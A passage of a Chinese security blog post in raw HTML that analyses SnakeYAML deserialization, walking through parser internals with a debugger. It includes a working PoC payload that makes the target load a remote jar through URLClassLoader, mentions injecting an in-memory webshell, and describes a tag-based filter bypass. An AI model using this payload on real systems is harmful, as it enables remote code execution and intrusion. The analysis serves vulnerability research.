src="https://wechat2rss.xlab.app/img-proxy/?k=80b199e9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEy8SEXicxm9Z730PTEF6ia3L1zWlJAKWBN3tcicCfFNRibDY8X5wTeqNlhg%2F640%3Fwx_fmt%3Dpng"/><span style="font-size: var(--articleFontsize);letter-spacing: 0.034em;text-align: justify;"></span></p><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;nhot-1677911972335&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;4rls-1677911972336&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;当然也可以写个自定义的&#34;,&#34;marks&#34;:[]},{&#34;text&#34;:&#34;ClassLoader&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#F33232&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;}]},{&#34;text&#34;:&#34;然后通过&#34;,&#34;marks&#34;:[]},{&#34;text&#34;:&#34;defineClass&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;},{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#F33232&#34;}]},{&#34;text&#34;:&#34;加载&#34;,&#34;marks&#34;:[]},{&#34;text&#34;:&#34; bytecode&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;}]},{&#34;text&#34;:&#34;的&#34;,&#34;marks&#34;:[]},{&#34;text&#34;:&#34;base64&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;},{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#F33232&#34;}]},{&#34;text&#34;:&#34;字符串达到打内存马的一个目的。&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}},{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;sVoE-1663600131096&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{&#34;version&#34;:1},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;XjWG-1663600131095&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;更改好之后通过如下命令编译打包&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}}]"><p><span style="font-size: 15px;letter-spacing: 0.034em;">编译打包</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.4064711830131446" data-s="300,640" style="" data-type="png" data-w="989" src="https://wechat2rss.xlab.app/img-proxy/?k=5a6647f4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEYrEGGhbPfoLLMiapumQpDLoXOn6vJOTeI8tT3HN45wqm2Msw4HKsEyg%2F640%3Fwx_fmt%3Dpng"/></p><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;F1tc-1677912203698&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;hYuy-1677912203696&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;之后在该目录开一个&#34;,&#34;marks&#34;:[]},{&#34;text&#34;:&#34;web&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#F33232&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;}]},{&#34;text&#34;:&#34;服务&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}},{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;GGC0-1677911684637&#34;,&#34;name&#34;:&#34;image&#34;,&#34;data&#34;:{&#34;version&#34;:1,&#34;url&#34;:&#34;https://note.youdao.com/yws/res/142177/WEBRESOURCEe9526c4c69bdd5d83614ec538d020b3f&#34;,&#34;width&#34;:784,&#34;height&#34;:305},&#34;nodes&#34;:[],&#34;state&#34;:{&#34;renderSource&#34;:&#34;https://note.youdao.com/yws/res/142177/WEBRESOURCEe9526c4c69bdd5d83614ec538d020b3f&#34;,&#34;initialSize&#34;:{&#34;width&#34;:784,&#34;height&#34;:305},&#34;loading&#34;:false}},{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;qQq5-1677911612176&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;YPAN-1677911612174&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;更改&#34;,&#34;marks&#34;:[]},{&#34;text&#34;:&#34;poc&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;},{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#F33232&#34;}]}]}],&#34;state&#34;:{}}]"><p><span style="font-size: 15px;">之后在该目录开一个<span style="font-size: 15px;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">web</span>服务</span></p><p><img class="rich_pages wxw-img" data-ratio="0.38903061224489793" style="width: 784px;height: 305px;" data-type="png" data-w="784" src="https://wechat2rss.xlab.app/img-proxy/?k=b0893df9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEp6wTJseqrGSkV7Tf9vM8Lu5sPVuBO3GM9cInT0DzDouGV9KSu21xLQ%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;">更改<span style="font-size: 15px;background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">poc</span></span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="properties"><code><span class="code-snippet_outer"><span class="code-snippet__comment">!!javax.script.ScriptEngineManager [</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment">  !!java.net.URLClassLoader [[</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment">    !!java.net.URL [&#34;<a href="http://127.0.0.1:8000/yaml-payload.jar" target="_blank">http://127.0.0.1:8000/yaml-payload.jar</a>&#34;]</span></span></code><code><span class="code-snippet_outer">  <span class="code-snippet__attr">]]</span></span></code><code><span class="code-snippet_outer"><span class="code-snippet__attr">]</span></span></code></pre></section><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;3R9K-1663600477264&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;ab8K-1663600477265&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;收到HTTP请求并成功弹出计算器&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}}]"><p><span style="font-size: 15px;">收到HTTP请求并成功弹出计算器</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.45122859270290394" data-s="300,640" style="" data-type="png" data-w="1343" src="https://wechat2rss.xlab.app/img-proxy/?k=0e468c9a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEKxZpSI8WZbsMITYolqeEtwJAibW90icAiae9Z6TFjuTSGKOibrxoniafn3w%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;Itgr-1663600536618&#34;,&#34;name&#34;:&#34;heading&#34;,&#34;data&#34;:{&#34;level&#34;:&#34;h2&#34;},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;ElIu-1663600536616&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;调试分析&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}},{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;Ef3F-1677915241163&#34;,&#34;name&#34;:&#34;heading&#34;,&#34;data&#34;:{&#34;level&#34;:&#34;h3&#34;},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;kouH-1677915241164&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;YAML解析部分&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}},{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;yQB5-1663600547813&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{&#34;version&#34;:1},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;ROeC-1663600547814&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;下面调试分析一下整个流程，在&#34;,&#34;marks&#34;:[]},{&#34;text&#34;:&#34;yaml.load(s)&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#F33232&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;}]},{&#34;text&#34;:&#34;处下断点&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}}]"><p><span style="font-weight: bold;font-size: 18px;">调试分析</span></p><p><span style="font-weight: bold;font-size: 16px;">YAML解析部分</span></p><p><span style="font-size: 15px;">下面调试分析一下整个流程，在<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">yaml.load(s)</span>处下断点</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.3783783783783784" data-s="300,640" style="" data-type="png" data-w="999" src="https://wechat2rss.xlab.app/img-proxy/?k=9bad86e9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEzh8lEv2lbLK3fnP1poo4WQm7KTN8kv8SJQCiapoDFc71dFzcw9icj7xA%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;sIa9-1663600626997&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{&#34;version&#34;:1},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;HxJY-1663600555823&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;首先通过&#34;,&#34;marks&#34;:[]},{&#34;text&#34;:&#34; StringReader &#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#F33232&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;}]},{&#34;text&#34;:&#34;处理我们传入的字符串，&#34;,&#34;marks&#34;:[]},{&#34;text&#34;:&#34;PoC&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#F33232&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;}]},{&#34;text&#34;:&#34;存储在&#34;,&#34;marks&#34;:[]},{&#34;text&#34;:&#34;StreamReader&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;},{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#F33232&#34;}]},{&#34;text&#34;:&#34;的&#34;,&#34;marks&#34;:[]},{&#34;text&#34;:&#34;this.stream&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;},{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#F33232&#34;}]},{&#34;text&#34;:&#34;字段值里。&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}}]"><p><span style="font-size: 15px;">首先通过<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);"> StringReader </span>处理我们传入的字符串，<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">PoC</span>存储在<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">StreamReader</span>的<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">this.stream</span>字段值里。</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.07773851590106007" data-s="300,640" style="" data-type="png" data-w="1132" src="https://wechat2rss.xlab.app/img-proxy/?k=8a175649&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEnF2QCoibpT67iaVwiaVhdR34AHCMqiaqrMbicmk3kicwRAdJdk3wOngW0IRA%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.1467136150234742" data-s="300,640" style="" data-type="png" data-w="852" src="https://wechat2rss.xlab.app/img-proxy/?k=d4a45d55&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrE96qX10wcKTU2183ru0JgRt07NJUgglbplWIf5ela4vRLNzVOhiaA5fA%2F640%3Fwx_fmt%3Dpng"/></p></article></article><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.15325248070562295" data-s="300,640" style="" data-type="png" data-w="907" src="https://wechat2rss.xlab.app/img-proxy/?k=cb7a141d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrECCfpwea3Vn39C7febYPlGUobRXTp4dXsgWCZztQHNHUBXxu5icibOAmg%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;letter-spacing: 0.034em;">上面主要是对输入的</span><span style="font-size: 15px;letter-spacing: 0.034em;background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">payload</span><span style="font-size: 15px;letter-spacing: 0.034em;">进行赋值与简单处理的操作，之后进入</span><span style="font-size: 15px;letter-spacing: 0.034em;background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">loadFromReader(new StreamReader(yaml), Object.class)</span><span style="font-size: 15px;letter-spacing: 0.034em;">方法中，该方法内逻辑如下</span><br/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5506230529595015" data-s="300,640" style="" data-type="png" data-w="1284" src="https://wechat2rss.xlab.app/img-proxy/?k=3686b48a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEWMYUc0AB2GdIpoQCulLLWQPSHyQUxItzrvrkWpjvqJ1ILDRjDQSLdQ%2F640%3Fwx_fmt%3Dpng"/><span style="font-size: var(--articleFontsize);letter-spacing: 0.034em;text-align: justify;"></span></p><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;JNVp-1663601039204&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{&#34;version&#34;:1},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;HkQc-1663601039203&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;首先会对我们传入的&#34;,&#34;marks&#34;:[]},{&#34;text&#34;:&#34;payload&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;},{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#F33232&#34;}]},{&#34;text&#34;:&#34;进行处理，封装成&#34;,&#34;marks&#34;:[]},{&#34;text&#34;:&#34;Composer&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;},{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#F33232&#34;}]},{&#34;text&#34;:&#34;对象。&#34;,&#34;marks&#34;:[]}]}],&#34;state&#34;:{}}]"><p><span style="font-size: 15px;">首先会对我们传入的<span style="font-size: 15px;background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">payload</span>进行处理，封装成<span style="font-size: 15px;background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">Composer</span>对象。</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.47768595041322315" data-s="300,640" style="" data-type="png" data-w="1210" src="https://wechat2rss.xlab.app/img-proxy/?k=cae0b69e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrE8YDIkvrtTEfOIDZKRhjW8cfWRrYmJaA6ibka4TkhGABkZLVEicfrM0ibw%2F640%3Fwx_fmt%3Dpng"/><span style="font-size: var(--articleFontsize);letter-spacing: 0.034em;text-align: justify;"></span></p><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;Qohy-1663627671267&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;gy5Y-1663627671265&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;这里实际上还有一个细节点&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#333333&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;rgb(255, 255, 255)&#34;},{&#34;type&#34;:&#34;fontSize&#34;,&#34;value&#34;:18},{&#34;type&#34;:&#34;fontFamily&#34;,&#34;value&#34;:&#34;Arial&#34;}]},{&#34;text&#34;:&#34;，那就是&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;fontSize&#34;,&#34;value&#34;:18}]},{&#34;text&#34;:&#34;new ParserImpl&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;fontSize&#34;,&#34;value&#34;:18},{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#F33232&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;}]},{&#34;text&#34;:&#34;的操作&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;fontSize&#34;,&#34;value&#34;:18}]}]}],&#34;state&#34;:{}}]"><p><span style="font-size: 15px;"><span style="font-size: 15px;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">这里实际上还有一个细节点</span>，那就是<span style="font-size: 15px;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">new ParserImpl</span>的操作</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.135706340378198" data-s="300,640" style="" data-type="png" data-w="899" src="https://wechat2rss.xlab.app/img-proxy/?k=57a505a8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrE1xAdR83ky9zpVciczB0dGicOIRHG3JqZJym6ic6x3wR3wHej5qYpG2m7w%2F640%3Fwx_fmt%3Dpng"/></p></article><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.2754399387911247" data-s="300,640" style="" data-type="png" data-w="1307" src="https://wechat2rss.xlab.app/img-proxy/?k=f88262ca&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEdrwKEibVtTZyYIFFmo7bcMNtTZ8z3iacuaSqfdOIupJhUKyozVhPZM5w%2F640%3Fwx_fmt%3Dpng"/><span style="font-size: var(--articleFontsize);letter-spacing: 0.034em;text-align: justify;"></span></p><article><p><span style="font-size: 15px;">这里注意<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);"> !! -&gt; tag:yaml.org,2002: </span>后续也会对我们传入的<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);"> payload </span>进行字符串替换的操作。</span></p><p><span style="font-size: 15px;">之后调用<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">BaseConstructor#setComposer()</span>方法，对<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">Composer</span>进行赋值，最终进入<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">BaseConstructor#getSingleData(type)</span>方法内，跟进后会调用<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">this.composer.getSingleNode()</span>方法对我们传入的<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">payload</span>进行处理，会把<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">!!</span>变成<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">tagxx</span>一类的标识</span></p><p><span style="font-size: 15px;">这个在</span><span style="color: rgb(0, 56, 132);font-size: 15px;">浅蓝师傅的文章</span><span style="font-size: 15px;">中也有提到过，对于一些yaml常用的set map等类型都是一个tag，属于是在过滤掉<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);"> !! </span>的情况下可以通过这种<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);"> tag </span>形式去进行<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">Bypass</span>，详细的思路可参考浅蓝师傅的文章。</span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="php"><code><span class="code-snippet_outer">public static final String PREFIX = &#34;tag:yaml.org,2002:&#34;;</span></code><code><span class="code-snippet_outer">public static final Tag YAML = new Tag(&#34;tag:yaml.org,2002:yaml&#34;);</span></code><code><span class="code-snippet_outer">public static final Tag MERGE = new Tag(&#34;tag:yaml.org,2002:merge&#34;);</span></code><code><span class="code-snippet_outer">public static final Tag SET = new Tag(&#34;tag:yaml.org,2002:set&#34;);</span></code><code><span class="code-snippet_outer">public static final Tag PAIRS = new Tag(&#34;tag:yaml.org,2002:pairs&#34;);</span></code><code><span class="code-snippet_outer">public static final Tag OMAP = new Tag(&#34;tag:yaml.org,2002:omap&#34;);</span></code><code><span class="code-snippet_outer">public static final Tag BINARY = new Tag(&#34;tag:yaml.org,2002:binary&#34;);</span></code><code><span class="code-snippet_outer">public static final Tag INT = new Tag(&#34;tag:yaml.org,2002:int&#34;);</span></code><code><span class="code-snippet_outer">public static final Tag FLOAT = new Tag(&#34;tag:yaml.org,2002:float&#34;);</span></code><code><span class="code-snippet_outer">public static final Tag TIMESTAMP = new Tag(&#34;tag:yaml.org,2002:timestamp&#34;);</span></code><code><span class="code-snippet_outer">public static final Tag BOOL = new Tag(&#34;tag:yaml.org,2002:bool&#34;);</span></code><code><span class="code-snippet_outer">public static final Tag NULL = new Tag(&#34;tag:yaml.org,2002:null&#34;);</span></code><code><span class="code-snippet_outer">public static final Tag STR = new Tag(&#34;tag:yaml.org,2002:str&#34;);</span></code><code><span class="code-snippet_outer">public static final Tag SEQ = new Tag(&#34;tag:yaml.org,2002:seq&#34;);</span></code><code><span class="code-snippet_outer">public static final Tag MAP = new Tag(&#34;tag:yaml.org,2002:map&#34;);</span></code></pre></section><article><p><span style="font-size: 15px;">而<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);"> tag </span>具体的替换以及整个<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">payload</span>重新组合的逻辑在<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">ParserImpl#parseNode()</span>方法中。</span></p><p><span style="font-size: 15px;"><span style="color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">继续回到</span><span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);font-family: Arial;"> loadFromReader </span><span style="color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">跟进到</span><span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);font-family: Arial;">constructor.getSingleData</span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.3677474402730375" data-s="300,640" style="" data-type="png" data-w="1172" src="https://wechat2rss.xlab.app/img-proxy/?k=b68b1134&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEe3TEGia5JaYCSVBcwRAjibdX1HXR2gaM13ZrM1UnWNguACJmWgNLOaibw%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;letter-spacing: 0.034em;">具体的处理逻辑比较复杂，调试起来也比较费劲，而且它是一位一位进行处理，所以说这里我就把具体的处理过程跳过了，简单放张截图</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.6809487375669472" data-s="300,640" style="" data-type="png" data-w="1307" src="https://wechat2rss.xlab.app/img-proxy/?k=c374d9a4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEOa54lTyryicKyMBv3UwCm84PDicsoibcsb0arjbMqbZiapeMYUyEOpzYGA%2F640%3Fwx_fmt%3Dpng"/><span style="font-size: var(--articleFontsize);letter-spacing: 0.034em;text-align: justify;"></span></p></article><article><p><span style="font-size: 15px;">然后<span style="font-size: 15px;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">调用</span><span style="font-size: 15px;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);font-family: Arial;"> constructDocument </span><span style="font-size: 15px;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">，跟进</span><span style="font-size: 15px;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);font-family: Arial;"> constructDocument </span><span style="font-size: 15px;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">， 会调用</span><span style="font-size: 15px;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);font-family: Arial;">constructObject</span><span style="font-size: 15px;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">来获取一个</span><span style="font-size: 15px;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);font-family: Arial;">Object</span><span style="font-size: 15px;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">对象</span></span></p></article><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.3582474226804124" data-s="300,640" style="" data-type="png" data-w="1164" src="https://wechat2rss.xlab.app/img-proxy/?k=38b4cd0e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrEr6gTgeIZRvt6v7OoEDhsGWr1Uoib7XDst9dYMJ0mCulaL9zkY7VKwGA%2F640%3Fwx_fmt%3Dpng"/></p></article><article data-content="[{&#34;type&#34;:&#34;block&#34;,&#34;id&#34;:&#34;TzX5-1677915381107&#34;,&#34;name&#34;:&#34;paragraph&#34;,&#34;data&#34;:{},&#34;nodes&#34;:[{&#34;type&#34;:&#34;text&#34;,&#34;id&#34;:&#34;MB9V-1677915381105&#34;,&#34;leaves&#34;:[{&#34;text&#34;:&#34;跟进该方法, 进一步调用&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#333333&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;rgb(255, 255, 255)&#34;},{&#34;type&#34;:&#34;fontSize&#34;,&#34;value&#34;:18},{&#34;type&#34;:&#34;fontFamily&#34;,&#34;value&#34;:&#34;Arial&#34;}]},{&#34;text&#34;:&#34; constructObjectNoCheck &#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#F33232&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;#FDEEEE&#34;},{&#34;type&#34;:&#34;fontSize&#34;,&#34;value&#34;:18},{&#34;type&#34;:&#34;fontFamily&#34;,&#34;value&#34;:&#34;Arial&#34;}]},{&#34;text&#34;:&#34;.&#34;,&#34;marks&#34;:[{&#34;type&#34;:&#34;color&#34;,&#34;value&#34;:&#34;#333333&#34;},{&#34;type&#34;:&#34;backgroundColor&#34;,&#34;value&#34;:&#34;rgb(255, 255, 255)&#34;},{&#34;type&#34;:&#34;fontSize&#34;,&#34;value&#34;:18},{&#34;type&#34;:&#34;fontFamily&#34;,&#34;value&#34;:&#34;Arial&#34;}]}]}],&#34;state&#34;:{}}]"><p><span style="font-size: 15px;"><span style="font-size: 15px;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">跟进该方法, 进一步调用</span><span style="font-size: 15px;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);font-family: Arial;"> constructObjectNoCheck </span><span style="font-size: 15px;color: rgb(51, 51, 51);background-color: rgb(255, 255, 255);font-family: Arial;">.</span></span></p></article><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.3182086034177961" data-s="300,640" style="" data-type="png" data-w="1697" 